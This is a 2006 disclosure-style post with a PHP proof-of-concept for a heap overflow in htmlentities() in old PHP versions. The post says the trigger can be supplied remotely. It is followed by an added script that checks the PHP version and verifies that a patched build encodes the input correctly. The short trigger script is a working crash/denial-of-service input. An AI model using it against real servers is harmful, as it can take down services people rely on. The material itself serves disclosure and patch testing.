PoC / Exploit for PHP HTML Entity Encoder Heap Overflow Vulnerability - Crash/DoS?

7-11-2006

I like Proof of Concepts, so this is a simple PoC for the PHP HTML Entity Encoder Heap Overflow Vulnerability. The payload can be supplied from a request, so it is remotely triggerable.

Original Advisory : http://www.securityfocus.com/archive/1/450431

<?php

// Affected: PHP 5 <= 5.1.6, PHP 4 <= 4.4.4
echo "something... we need this stupid echo or do something else...";

// Two-byte UTF-8 encoding of a code point in the range U+0080..U+07FF.
function code2utf($num) {
    return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
}

// 64 copies of U+03D1 (code point 977), a character that htmlentities()
// must expand to a much longer named entity.
$fuzzFixed = "";
for ($pl = 0; $pl < 64; $pl++) {
    $fuzzFixed .= code2utf(977);
}

// Triggers the heap overflow on an affected build.
htmlentities($fuzzFixed, ENT_NOQUOTES, "utf-8");

echo "ehm...";
?>
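As an added example (not part of the original post), here is the check a sysadmin would run instead of the PoC: it refuses to call the encoder on a PHP version the post lists as affected, and otherwise verifies that the same input is encoded correctly. It assumes the affected ranges exactly as stated above, and that code point 977 (U+03D1) is named &thetasym; in the HTML 4.01 entity table that htmlentities() uses.

```php
<?php
// Added patch-verification script; not from the original post.
// Assumptions: affected ranges as given in the post (PHP 5 <= 5.1.6,
// PHP 4 <= 4.4.4); U+03D1 maps to the named entity &thetasym;.

// Two-byte UTF-8 encoding of a code point in the range U+0080..U+07FF.
function code2utf($num) {
    return chr(($num >> 6) + 192) . chr(($num & 63) + 128);
}

// True if $version falls inside the affected ranges the post lists.
function is_affected_php_version($version) {
    if (version_compare($version, '5.0.0', '>=')) {
        return version_compare($version, '5.1.6', '<=');
    }
    return version_compare($version, '4.4.4', '<=');
}

// Same input as the PoC: 64 copies of U+03D1, 128 bytes in total.
function build_input($count = 64) {
    $s = '';
    for ($i = 0; $i < $count; $i++) {
        $s .= code2utf(977);
    }
    return $s;
}

// A correct encoder turns each 2-byte character into the 10-byte entity
// &thetasym;, so the output is five times the size of the input.
function expected_output($count = 64) {
    return str_repeat('&thetasym;', $count);
}

if (is_affected_php_version(PHP_VERSION)) {
    echo "PHP " . PHP_VERSION . " is within the affected range; upgrade before testing.\n";
    exit(1);
}

$out = htmlentities(build_input(), ENT_NOQUOTES, 'UTF-8');
if ($out === expected_output()) {
    echo "htmlentities() handled the input correctly on PHP " . PHP_VERSION . "\n";
} else {
    echo "unexpected output (" . strlen($out) . " bytes); investigate this build\n";
    exit(1);
}
```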
